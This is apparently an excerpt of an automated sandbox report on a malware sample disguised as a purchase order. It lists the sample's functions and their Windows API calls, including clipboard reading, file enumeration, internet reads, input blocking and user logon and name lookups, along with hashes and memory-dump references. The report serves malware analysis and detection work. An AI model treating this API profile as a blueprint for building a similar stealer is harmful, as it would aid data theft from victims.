                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                            • String ID: .lnk
                                                            • API String ID: 886957087-24824748
                                                            • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                            • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                            • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                            • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                            Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenClipboard.USER32(?), ref: 0046DCE7
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                            • CloseClipboard.USER32 ref: 0046DD0D
                                                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                            • CloseClipboard.USER32 ref: 0046DD41
                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                            • CloseClipboard.USER32 ref: 0046DD99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                            • String ID:
                                                            • API String ID: 15083398-0
                                                            • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                            • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                            • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                            • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                            Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: U$\
                                                            • API String ID: 4104443479-100911408
                                                            • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                            • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                            • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                            • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                            Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                            • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                            • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                            • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                            Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                            • FindClose.KERNEL32(00000000), ref: 004339EB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                            • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                            • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                            • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                            Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                            • String ID:
                                                            • API String ID: 901099227-0
                                                            • Opcode ID: 1d0ebaafe3aed14c1a54a83829ac0275269f0a6eaf776995207d6a59000f75fb
                                                            • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                            • Opcode Fuzzy Hash: 1d0ebaafe3aed14c1a54a83829ac0275269f0a6eaf776995207d6a59000f75fb
                                                            • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                            Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Proc
                                                            • String ID:
                                                            • API String ID: 2346855178-0
                                                            • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                            • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                            • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                            • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                            Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • BlockInput.USER32(00000001), ref: 0045A38B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: BlockInput
                                                            • String ID:
                                                            • API String ID: 3456056419-0
                                                            • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                            • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                            • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                            • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                            Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                            • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                            • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                            • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                            Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID:
                                                            • API String ID: 2645101109-0
                                                            • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                            • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                            • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                            • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                            Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                            • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                            • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                            • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                            Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: N@
                                                            • API String ID: 0-1509896676
                                                            • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                            • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                            • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                            • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                            Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                            • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                            • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                            • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                            Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                            • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                            • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                            • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                            Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                            • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                            • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                            • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                            Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                            • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                            • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                            • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                            Function 03FA3668 Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
